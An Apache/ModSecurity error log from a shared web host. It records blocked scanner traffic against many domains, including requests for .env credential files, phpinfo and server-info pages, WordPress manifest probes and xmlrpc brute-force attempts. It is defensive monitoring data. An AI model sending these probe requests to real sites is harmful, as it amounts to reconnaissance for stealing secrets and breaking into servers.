[Tue May 26 15:04:19.254883 2026] [security2:error] [pid 678998:tid 679138] [client 34.158.15.150:50343] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahVpG5-Rl4i_pgT-iAdgqwAAAAo"]
[Tue May 26 15:04:19.427196 2026] [security2:error] [pid 678998:tid 679125] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.env"] [unique_id "ahVpG5-Rl4i_pgT-iAdguQAADH4"]
[Tue May 26 15:04:19.851431 2026] [security2:error] [pid 678998:tid 679169] [client 74.249.173.207:4307] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/cache.php"] [unique_id "ahVpG5-Rl4i_pgT-iAdgxwAAACk"]
[Tue May 26 15:04:19.941807 2026] [security2:error] [pid 678998:tid 679172] [client 136.243.220.209:20676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpG5-Rl4i_pgT-iAdgyAAAACw"]
[Tue May 26 15:04:21.128076 2026] [security2:error] [pid 678998:tid 679210] [client 34.158.15.150:50648] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVpHZ-Rl4i_pgT-iAdg9QAAAFI"]
[Tue May 26 15:04:21.234389 2026] [security2:error] [pid 678998:tid 679068] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.env.backup"] [unique_id "ahVpHZ-Rl4i_pgT-iAdg9gAAKEU"]
[Tue May 26 15:04:22.430804 2026] [autoindex:error] [pid 678998:tid 679198] [client 45.94.31.112:0] AH01276: Cannot serve directory /home1/moesartc/public_html/vishaal-shah.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:04:22.610495 2026] [autoindex:error] [pid 678998:tid 679183] [client 45.94.31.112:0] AH01276: Cannot serve directory /home1/moesartc/public_html/vishaal-shah.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:04:22.764787 2026] [security2:error] [pid 678998:tid 679187] [client 45.94.31.112:63673] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVpHp-Rl4i_pgT-iAdhKQAAADs"]
[Tue May 26 15:04:22.827330 2026] [security2:error] [pid 678998:tid 679244] [client 34.158.15.150:63325] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVpHp-Rl4i_pgT-iAdhKgAAAHQ"]
[Tue May 26 15:04:22.957936 2026] [security2:error] [pid 678998:tid 679138] [client 74.249.173.207:4314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/themes.php"] [unique_id "ahVpHp-Rl4i_pgT-iAdhNAAAAAo"]
[Tue May 26 15:04:22.967475 2026] [security2:error] [pid 678998:tid 679235] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpHp-Rl4i_pgT-iAdhHgAAAGs"]
[Tue May 26 15:04:23.060342 2026] [security2:error] [pid 678998:tid 679022] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.env.bak"] [unique_id "ahVpH5-Rl4i_pgT-iAdhOwAAeBc"]
[Tue May 26 15:04:23.264886 2026] [security2:error] [pid 678998:tid 679251] [client 45.94.31.112:64100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 112.31.94.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/xmlrpc.php"] [unique_id "ahVpH5-Rl4i_pgT-iAdhPAAAAHs"]
[Tue May 26 15:04:23.577479 2026] [security2:error] [pid 678998:tid 679194] [client 45.94.31.112:64469] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVpH5-Rl4i_pgT-iAdhTQAAAEI"]
[Tue May 26 15:04:23.838680 2026] [security2:error] [pid 678998:tid 679223] [client 136.243.220.209:57118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpH5-Rl4i_pgT-iAdhVwAAAF8"]
[Tue May 26 15:04:23.892403 2026] [security2:error] [pid 678998:tid 679132] [client 45.94.31.112:64735] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVpH5-Rl4i_pgT-iAdhWwAAAAQ"]
[Tue May 26 15:04:24.095932 2026] [security2:error] [pid 678998:tid 679202] [client 34.158.15.150:50619] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVpIJ-Rl4i_pgT-iAdhXwAAAEo"]
[Tue May 26 15:04:24.121292 2026] [security2:error] [pid 678998:tid 679227] [client 195.178.110.34:48692] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/server_info.php"] [unique_id "ahVpIJ-Rl4i_pgT-iAdhYQAAAGM"]
[Tue May 26 15:04:24.212811 2026] [security2:error] [pid 678998:tid 679243] [client 45.94.31.112:64970] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVpIJ-Rl4i_pgT-iAdhaAAAAHM"]
[Tue May 26 15:04:24.516176 2026] [security2:error] [pid 678998:tid 679143] [client 45.94.31.112:65154] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVpIJ-Rl4i_pgT-iAdhbAAAAA8"]
[Tue May 26 15:04:24.619040 2026] [security2:error] [pid 678998:tid 679197] [client 195.178.110.34:48702] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/app_dev.php/_profiler/phpinfo"] [unique_id "ahVpIJ-Rl4i_pgT-iAdhegAAAEU"]
[Tue May 26 15:04:24.830882 2026] [security2:error] [pid 678998:tid 679175] [client 45.94.31.112:65312] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahVpIJ-Rl4i_pgT-iAdhfgAAAC8"]
[Tue May 26 15:04:24.849070 2026] [security2:error] [pid 678998:tid 679034] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.env.config"] [unique_id "ahVpIJ-Rl4i_pgT-iAdhfwAAQiM"]
[Tue May 26 15:04:24.979996 2026] [security2:error] [pid 678998:tid 679251] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpIJ-Rl4i_pgT-iAdhcgAAAHs"]
[Tue May 26 15:04:25.069174 2026] [security2:error] [pid 678998:tid 679236] [client 195.178.110.34:48706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/test.php"] [unique_id "ahVpIZ-Rl4i_pgT-iAdhiAAAAGw"]
[Tue May 26 15:04:25.142081 2026] [security2:error] [pid 678998:tid 679214] [client 45.94.31.112:65457] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahVpIZ-Rl4i_pgT-iAdhigAAAFY"]
[Tue May 26 15:04:25.445887 2026] [security2:error] [pid 678998:tid 679135] [client 45.94.31.112:49224] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVpIZ-Rl4i_pgT-iAdhmQAAAAc"]
[Tue May 26 15:04:25.550325 2026] [security2:error] [pid 678998:tid 679255] [client 74.249.173.207:4305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/an.php"] [unique_id "ahVpIZ-Rl4i_pgT-iAdhnQAAAH8"]
[Tue May 26 15:04:25.623437 2026] [security2:error] [pid 678998:tid 679248] [client 195.178.110.34:48714] ModSecurity: Access denied with code 406 (phase 2). Match of "ipMatch 127.0.0.1,::1" against "REMOTE_ADDR" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "724"] [id "340114"] [rev "2"] [msg "Atomicorp.com WAF Rules: Apache admin service access attempt"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/server-info"] [unique_id "ahVpIZ-Rl4i_pgT-iAdhoQAAAHg"]
[Tue May 26 15:04:25.766966 2026] [security2:error] [pid 678998:tid 679134] [client 45.94.31.112:49405] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVpIZ-Rl4i_pgT-iAdhowAAAAY"]
[Tue May 26 15:04:25.880837 2026] [security2:error] [pid 678998:tid 679221] [client 195.178.110.34:48714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/server-info.php"] [unique_id "ahVpIZ-Rl4i_pgT-iAdhqQAAAF0"]
[Tue May 26 15:04:26.089700 2026] [security2:error] [pid 678998:tid 679233] [client 45.94.31.112:49624] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVpIp-Rl4i_pgT-iAdhtAAAAGk"]
[Tue May 26 15:04:26.118162 2026] [security2:error] [pid 678998:tid 679223] [client 34.158.15.150:50691] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVpIp-Rl4i_pgT-iAdhtQAAAF8"]
[Tue May 26 15:04:26.251255 2026] [security2:error] [pid 678998:tid 679236] [client 195.178.110.34:48720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/secured/phpinfo.php"] [unique_id "ahVpIp-Rl4i_pgT-iAdhuQAAAGw"]
[Tue May 26 15:04:26.415792 2026] [security2:error] [pid 678998:tid 679237] [client 45.94.31.112:49808] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahVpIp-Rl4i_pgT-iAdhwwAAAG0"]
[Tue May 26 15:04:26.447295 2026] [security2:error] [pid 678998:tid 679203] [client 34.158.15.150:51757] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVpIp-Rl4i_pgT-iAdhxQAAAEs"]
[Tue May 26 15:04:26.590231 2026] [security2:error] [pid 678998:tid 679219] [client 74.249.173.207:4301] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/index/function.php"] [unique_id "ahVpIp-Rl4i_pgT-iAdhxgAAAFs"]
[Tue May 26 15:04:26.673211 2026] [security2:error] [pid 678998:tid 679049] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.env.dev"] [unique_id "ahVpIp-Rl4i_pgT-iAdhzQAACTI"]
[Tue May 26 15:04:26.737747 2026] [security2:error] [pid 678998:tid 679178] [client 45.94.31.112:50019] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahVpIp-Rl4i_pgT-iAdhzgAAADI"]
[Tue May 26 15:04:26.858881 2026] [security2:error] [pid 678998:tid 679182] [client 35.94.96.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "velanstore.ca"] [uri "/index.php"] [unique_id "ahVpIp-Rl4i_pgT-iAdhrQAAADY"]
[Tue May 26 15:04:27.057974 2026] [security2:error] [pid 678998:tid 679144] [client 45.94.31.112:50193] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVpI5-Rl4i_pgT-iAdh3AAAABA"]
[Tue May 26 15:04:27.362555 2026] [security2:error] [pid 678998:tid 679193] [client 45.94.31.112:50398] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "vishaal-shah.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahVpI5-Rl4i_pgT-iAdh6QAAAEE"]
[Tue May 26 15:04:27.542066 2026] [security2:error] [pid 678998:tid 679132] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpI5-Rl4i_pgT-iAdh3wAAAAQ"]
[Tue May 26 15:04:27.586126 2026] [security2:error] [pid 678998:tid 679192] [client 85.208.96.209:29764] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/page/2/"] [unique_id "ahVpI5-Rl4i_pgT-iAdh9QAAAEA"]
[Tue May 26 15:04:27.586256 2026] [security2:error] [pid 678998:tid 679192] [client 85.208.96.209:29764] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/page/2/"] [unique_id "ahVpI5-Rl4i_pgT-iAdh9QAAAEA"]
[Tue May 26 15:04:27.622837 2026] [security2:error] [pid 678998:tid 679249] [client 154.161.32.97:57101] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVpI5-Rl4i_pgT-iAdh8wAAAHk"]
[Tue May 26 15:04:27.622948 2026] [security2:error] [pid 678998:tid 679249] [client 154.161.32.97:57101] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVpI5-Rl4i_pgT-iAdh8wAAAHk"]
[Tue May 26 15:04:27.700005 2026] [security2:error] [pid 678998:tid 679154] [client 113.165.229.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpI5-Rl4i_pgT-iAdh6AAAABo"]
[Tue May 26 15:04:27.731905 2026] [core:error] [pid 678998:tid 679164] [client 74.249.173.207:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:04:27.731922 2026] [core:error] [pid 678998:tid 679164] [client 74.249.173.207:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:04:28.197355 2026] [security2:error] [pid 678998:tid 679182] [client 136.243.220.209:16907] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpJJ-Rl4i_pgT-iAdiDwAAADY"]
[Tue May 26 15:04:28.255865 2026] [security2:error] [pid 678998:tid 679163] [client 154.161.32.97:57102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVpJJ-Rl4i_pgT-iAdiEQAAACM"]
[Tue May 26 15:04:28.255964 2026] [security2:error] [pid 678998:tid 679163] [client 154.161.32.97:57102] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVpJJ-Rl4i_pgT-iAdiEQAAACM"]
[Tue May 26 15:04:28.500019 2026] [security2:error] [pid 678998:tid 679059] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.env.live"] [unique_id "ahVpJJ-Rl4i_pgT-iAdiGwAAHTw"]
[Tue May 26 15:04:28.787974 2026] [security2:error] [pid 678998:tid 679215] [client 74.249.173.207:4329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/ws.php"] [unique_id "ahVpJJ-Rl4i_pgT-iAdiKgAAAFc"]
[Tue May 26 15:04:29.403332 2026] [security2:error] [pid 678998:tid 679173] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpJJ-Rl4i_pgT-iAdiNQAAAC0"]
[Tue May 26 15:04:29.716422 2026] [fcgid:warn] [pid 678998:tid 679194] (70014)End of file found: [client 45.33.14.5:48615] mod_fcgid: can't get data from http client
[Tue May 26 15:04:30.355037 2026] [security2:error] [pid 678998:tid 679104] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.env.local"] [unique_id "ahVpJp-Rl4i_pgT-iAdihAAAGWk"]
[Tue May 26 15:04:30.437709 2026] [security2:error] [pid 678998:tid 679185] [client 74.249.173.207:4296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/404.php"] [unique_id "ahVpJp-Rl4i_pgT-iAdihQAAADk"]
[Tue May 26 15:04:31.138287 2026] [security2:error] [pid 678998:tid 679211] [client 95.142.47.113:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVpJ5-Rl4i_pgT-iAdingAAAFM"], referer: http://www.anujtradingco.com/top-deejay-headphones/?unapproved=1080029&moderation-hash=0e87fce109a830c284db19e55e399fb4
[Tue May 26 15:04:31.160223 2026] [security2:error] [pid 678998:tid 679152] [client 195.2.79.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVpJ5-Rl4i_pgT-iAdiowAAABg"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1254784&moderation-hash=cbda9e44d8e7479c14e820181a0e0571
